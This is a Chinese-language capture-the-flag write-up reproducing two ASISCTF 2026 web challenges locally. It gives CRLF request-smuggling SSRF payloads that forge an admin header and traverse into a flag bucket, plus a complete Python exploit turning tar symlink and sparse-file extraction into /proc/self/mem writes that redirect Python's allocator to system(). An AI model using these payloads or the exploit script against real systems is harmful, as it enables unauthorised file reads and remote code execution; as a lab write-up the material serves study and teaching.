ASISCTF 2026题目复现

以下题目都是基本本地环境进行复现: 比赛期间没做出来 :)

0x01 ASIS_MAIL

题目提供了完整的源码
![[Pasted image 20260130144858.png]]

api中是一个go程序
sso是一个nodejs写的登录auth认证代码
objectstore是一个自己写的bucket

初始通过AI分析代码

题型判定与前提假设

  • 题型:源码审计 + 靶场/容器
  • 前提:你能访问前端暴露的 8081,并通过反向代理访问 objectstore 的 /files/ 入口。

##漏洞点与成因

  1. ObjectStore 目录穿越读取
    objectstore 对对象路径直接拼接,不做路径规范化;同时只根据 bucket == “FLAG” 做权限判断,因此可用 ../FLAG/… 绕过。
@app.route("/<bucket>/<path:object_name>", methods=["PUT", "GET", "DELETE"])
@require_auth
def object_ops(bucket, object_name, is_admin=False):
    bucket_dir = STORAGE / bucket
    bucket_dir.mkdir(parents=True, exist_ok=True)
    obj_path = bucket_dir / object_name
    ...
    elif request.method == "GET":
        if not obj_path.exists():
            return jsonify({"error":"not found"}), 404
        if bucket == "FLAG" and is_admin is False:
            return jsonify({"error":"forbidden"}), 403
        return send_file(obj_path, as_attachment=True)
  1. 公共下载端点可直接访问

Nginx 对 /files/ 直接反代到 objectstore,没有鉴权。

    location /files/ {
      proxy_pass http://obj_up/;
      proxy_set_header Host $host;
    }
  1. flag 文件名是 md5(内容) 派生
    objectstore 启动时将 flag.txt 重命名为 flag-.txt。

  2. 存在一个SSRF点 /api/compose

所以如果已知文件名称可以使用poc, 直接读取flag

POST /api/compose HTTP/1.1
Host: 192.168.126.131:8081
Authorization: Bearer 735ffc48-67d2-4841-9829-13f8c68dfe71
Accept-Language: en-US;q=0.9,en;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 307


xml=<message>
<to>u1@asismail.local</to>
<subject>3-list</subject>
<body>2</body>
<attachment_url>http://objectstore:8082/public/3/../../../../../data/FLAG/flag-f18b815262ce4ba0627a2fd21e7fa3b4.txt</attachment_url>
</message>

但是线上的环境是不同的, 所以需要列目录拿到文件名.

def require_auth(f):
    @wraps(f)
    def wrapper(*args, **kwargs):
        user_id = request.headers.get("X-User-Id", "")
        if not user_id:
            return jsonify({"error":"authorization required"}), 401
        is_admin = user_id == "999"
        kwargs.update({"is_admin": is_admin})
        return f(*args, **kwargs)
    return wrapper
    
@app.route("/<bucket>", methods=["GET", "POST"])
@require_auth
def bucket_ops(bucket, is_admin=False):
    bucket_dir = STORAGE / bucket
    bucket_dir.mkdir(parents=True, exist_ok=True)
    if request.method == "GET":
        if bucket == "FLAG" and is_admin is False:
            return jsonify({"error":"forbidden"}), 403
        # list query ?list=1
        listing = []
        for p in bucket_dir.rglob('*'):
            if p.is_file():
                rel = p.relative_to(bucket_dir)
                listing.append(str(rel))
        return jsonify({"bucket": bucket, "objects": listing})
    elif request.method == "POST":
        # multipart upload form field 'file'
        if 'file' not in request.files:
            return jsonify({"error":"no file"}), 400
        f = request.files['file']
        filename = str(uuid4()) # f.filename
        dest = bucket_dir / filename
        f.save(dest)
        return jsonify({"bucket": bucket, "key": filename, "url": f"/public/{bucket}/{filename}"}), 201

只要为get请求就可以列出目录 if bucket == “FLAG” and is_admin is False但是如果这两个条件都被满足就403. 注意require_auth 需要从头部获取X-User-Id为999 但是nginx中配置了

if ($http_x_user_id != "") {
        return 400;
    }

无法从web前端/files/FLAG?list去设置头. 没思路了, 继续去分析go api程序

二进制里出现了 http+post://download.bin,说明可能支持“POST 方式下载”(常见于 go-getter)。
发现attachment_url还支持http+post:// 去请求
测试:attachment_url 是否支持 http+post://,以及是否带头。
测试结果: http+post:// 是被支持并且存在crlf

所以直接尝试

curl -s -X POST http://192.168.126.131:8081/api/compose \
  -H "Authorization: Bearer <token>" \
  -F "xml=<message>
        <to>u1@asismail.local</to>
        <subject>list-flag</subject>
        <body>1</body>
        <attachment_url>http+post://objectstore:8082/FLAG?list=1%0d%0aX-User-Id:%20999%0d%0a</attachment_url>
      </message>"

但是有个蛋疼的点就是如果发送POST请求,直接就进入了elif request.method == “POST”:的流程.(然后卡住了).

二更:
其实这个思路一更得时候已经尝试过了 并没有成功. 现在发现是少了个换行 :)

漏洞利用思路
利用 attachment_url 构造带 %0d%0a 的 rawTarget
通过 request smuggling 插入第二个请求:

Payload 1:列目录

http+post://objectstore:8082/FLAG?list=1 HTTP/1.1\r\n
Host: objectstore:8082\r\n
X-User-Id: 999\r\n
\r\n
GET /FLAG?list=1 HTTP/1.1\r\n
Host: objectstore:8082\r\n
X-User-Id: 999\r\n
\r\n

URL 编码版本:

http+post://objectstore:8082/FLAG?list=1%20HTTP/1.1%0d%0aHost:%20objectstore:8082%0d%0aX-User-Id:%20999%0d%0a%0d%0aGET%20/FLAG?list=1%20HTTP/1.1%0d%0aHost:%20objectstore:8082%0d%0aX-User-Id:%20999%0d%0a%0d%0a

返回:
{“bucket”:”FLAG”,”objects”:[“flag-.txt”]}

Payload 2:读取文件
替换成真实文件名:

[http+post://objectstore:8082/FLAG?list=1%20HTTP/1.1%0d%0aHost:%20objectstore:8082%0d%0aX-User-Id:%20999%0d%0a%0d%0aGET%20/FLAG/flag-<md5>.txt%20HTTP/1.1%0d](http+post://objectstore:8082/FLAG?list=1%20HTTP/1.1%0d%0aHost:%20objectstore:8082%0d%0aX-User-Id:%20999%0d%0a%0d%0aGET%20/FLAG/flag-<md5>.txt%20HTTP/1.1%0d%0aHost:%20objectstore:8082%0d%0aX-User-Id:%20999%0d%0a%0d%0a)

0x02 Gemviewer

题目非常简单

from flask import Flask, abort, request
import tempfile
import tarfile
import gzip
import os

app = Flask(__name__)

@app.route("/")
def index():
    return """<!DOCTYPE html>
<html>
<head><title>Ruby Gems Viewer</title></head>
<body>
<h1>Ruby Gems Metadata Viewer</h1>
<form method='POST' action='/upload' enctype='multipart/form-data'>
<input type='file' name='file' accept='.gem'/>
<input type='submit' value='Upload'/>
</form>
</body>
</html>"""

@app.route("/upload", methods=["POST"])
def upload_file():
    if 'file' not in request.files:
        abort(400, description="No file part in the request")

    file = request.files['file']

    if file.filename == '':
        abort(400, description="No selected file")

    try:
        # .gem files are tar archives containing metadata.gz and data.tar.gz
        with tarfile.open(fileobj=file, mode='r:*') as gem_tar:
            with tempfile.TemporaryDirectory() as temp_dir:
                gem_tar.extractall(path=temp_dir,)

                metadata_path = os.path.join(temp_dir, 'metadata.gz')
                if os.path.exists(metadata_path):
                    try:
                        with gzip.open(metadata_path, 'rt') as gz:
                            metadata_content = gz.read()
                    except OSError:
                        raw_data = open(metadata_path, 'rb').read()
                        abort(400, description="Failed to decompress metadata.gz. The raw data is: " + repr(raw_data))
                    return f"""<!DOCTYPE html>
<html>
<head><title>Gem Metadata</title></head>
<body>
<h1>Gem Metadata</h1>
<pre>{metadata_content}</pre>
<a href="/">Back</a>
</body>
</html>"""

                return "No metadata.gz found in gem file"
    except tarfile.TarError as e:
        abort(400, description="Invalid gem file: " + str(e))

docker-compose.yml

services:
  eztar:
    build: .
    ports:
      - "5000:5000"
    user: "nobody"
    read_only: true
    tmpfs:
      - /tmp:mode=1777,size=64m
    environment:
      - TMPDIR=/tmp

dockerfile

FROM python:3.13.3-alpine

WORKDIR /app

RUN apk update && apk add build-base && rm -rf /var/cache/apk/*
RUN pip install --no-cache-dir flask gunicorn

COPY app.py /app/

RUN chmod 444 /app/app.py && \
    chmod 555 /app && \
    chown -R root:root /app

RUN echo "flag{fake}" > /flag
RUN chmod 0400 /flag
COPY readflag.c /readflag.c
RUN gcc /readflag.c -o /readflag
RUN chmod 4755 /readflag

USER nobody

EXPOSE 5000

CMD ["gunicorn", "--bind", "0.0.0.0:5000", "app:app"]

从tarfile来看存在明显的任意文件读取, 但是这样一个容器怎么样才能拿到flag呢

对此只能说 ai来:
利用链

  1. LFI Oracle: tar symlink metadata.gz -> /proc/self/maps 泄露内存映射。
  2. 计算基址: 定位 libpython3.13.sold-musl 基址。
  3. 稀疏写 /proc/self/mem 构造 GNU sparse tar 在指定地址写入。
  4. 篡改分配器: 覆盖 _PyRuntime.allocators,把 malloc 重定向到 system
  5. 触发执行: 下一次分配即 system(cmd)
  6. 读取 flag: 运行 /readflag --give-me-the-f|ag > /tmp/flag,再 LFI 读 /tmp/flag

python脚本

#!/usr/bin/env python3
import io
import os
import tarfile
import gzip
import struct
import time
import requests
import html
import ast

BASE_URL = os.environ.get("GEMVIEWER_URL", "http://127.0.0.1:5000")
UPLOAD_URL = f"{BASE_URL}/upload"

# Offsets from writeup (may need adjustment if binary differs)
PYRUNTIME_OFF = 0x5547e0
OBJ_CTX_OFF = 0x310
OBJ_MALLOC_OFF = 0x318
DEBUG_STORAGE_OFF = 0x338
SYSTEM_OFF = 0x5bb7e

SESSION = requests.Session()


def make_symlink_gem(out_path: str, target: str) -> None:
    link = tarfile.TarInfo("metadata.gz")
    link.type = tarfile.SYMTYPE
    link.linkname = target
    link.size = 0
    with tarfile.open(out_path, "w") as tf:
        tf.addfile(link, None)


def make_basic_gem(out_path: str, text: bytes = b"ping") -> None:
    buf = io.BytesIO()
    with gzip.GzipFile(fileobj=buf, mode="wb") as gz:
        gz.write(text)
    data = buf.getvalue()
    ti = tarfile.TarInfo("metadata.gz")
    ti.size = len(data)
    with tarfile.open(out_path, "w") as tf:
        tf.addfile(ti, io.BytesIO(data))


def make_sparse_mem_gem(out_path: str, writes: list[tuple[int, bytes]]) -> None:
    # writes: list of (address, data) to write into /proc/self/mem
    sparse_map = []
    data_stream = io.BytesIO()
    total_size = 0
    for addr, data in writes:
        sparse_map.append((addr, len(data)))
        data_stream.write(data)
        total_size = max(total_size, addr + len(data))

    ti = tarfile.TarInfo("../../../../proc/self/mem")
    # Keep size small to avoid truncate(EFBIG) on /proc/self/mem
    ti.size = data_stream.tell()
    ti.mtime = int(time.time())
    # Avoid huge truncate() on /proc/self/mem: keep sparse size small.
    ti.pax_headers = {
        "GNU.sparse.map": ",".join(str(x) for pair in sparse_map for x in pair),
        "GNU.sparse.size": str(data_stream.tell()),
    }
    data_stream.seek(0)
    with tarfile.open(out_path, "w", format=tarfile.PAX_FORMAT) as tf:
        tf.addfile(ti, data_stream)


def upload(path: str) -> str:
    with open(path, "rb") as f:
        r = SESSION.post(UPLOAD_URL, files={"file": f}, timeout=20)
    return r.text


def lfi_read(target: str) -> bytes:
    tmp_path = "/tmp/lfi.gem"
    make_symlink_gem(tmp_path, target)
    text = upload(tmp_path)
    marker = "Failed to decompress metadata.gz. The raw data is: "
    if marker in text:
        raw = text.split(marker, 1)[1]
        raw = raw.split("</p>", 1)[0]
        raw = html.unescape(raw)
        # raw should be like: b'...'
        try:
            return ast.literal_eval(raw)
        except Exception:
            return raw.encode("utf-8")
    return text.encode("utf-8")


def parse_bases(maps_text: str) -> tuple[int, int]:
    libpython = None
    ld_musl = None
    for line in maps_text.splitlines():
        parts = line.split()
        if len(parts) < 3:
            continue
        start = int(parts[0].split("-", 1)[0], 16)
        file_off = int(parts[2], 16)
        if "libpython" in line and "r-xp" in line:
            # Use image base, not segment start.
            libpython = start - file_off
        if "ld-musl" in line and "r-xp" in line:
            # Use image base, not segment start.
            ld_musl = start - file_off
    if libpython is None or ld_musl is None:
        raise RuntimeError("Failed to find libpython or ld-musl base in maps")
    return libpython, ld_musl


def exploit():
    print(f"[+] target: {UPLOAD_URL}")

    print("[+] leaking /proc/self/maps ...")
    maps_raw = lfi_read("/proc/self/maps")
    maps_text = maps_raw.decode("utf-8", errors="ignore")
    libpython_base, ld_base = parse_bases(maps_text)
    print(f"[+] libpython base: 0x{libpython_base:x}")
    print(f"[+] ld-musl base: 0x{ld_base:x}")

    pyruntime = libpython_base + PYRUNTIME_OFF
    obj_ctx = pyruntime + OBJ_CTX_OFF
    obj_malloc = pyruntime + OBJ_MALLOC_OFF
    debug_storage = pyruntime + DEBUG_STORAGE_OFF
    system_addr = ld_base + SYSTEM_OFF

    cmd = b"sh -c '/readflag --give-me-the-f\\|ag > /tmp/flag'\x00"

    print("[+] preparing sparse write to /proc/self/mem ...")
    writes = [
        (debug_storage, cmd),
        (obj_ctx, struct.pack("<Q", debug_storage)),
        (obj_malloc, struct.pack("<Q", system_addr)),
    ]
    sparse_path = "/tmp/sparse_mem.gem"
    make_sparse_mem_gem(sparse_path, writes)

    print("[+] uploading sparse write payload (request may timeout) ...")
    try:
        resp = upload(sparse_path)
        print("[+] sparse upload response (first 200 chars):")
        print(resp[:200])
    except Exception as e:
        print(f"[!] upload error (often expected if worker crashes): {e}")

    print("[+] triggering allocation ...")
    basic_path = "/tmp/basic.gem"
    make_basic_gem(basic_path, b"trigger")
    try:
        upload(basic_path)
    except Exception:
        pass

    print("[+] reading /tmp/flag via LFI ...")
    flag_raw = lfi_read("/tmp/flag")
    print(flag_raw.decode("utf-8", errors="ignore"))


if __name__ == "__main__":
    exploit()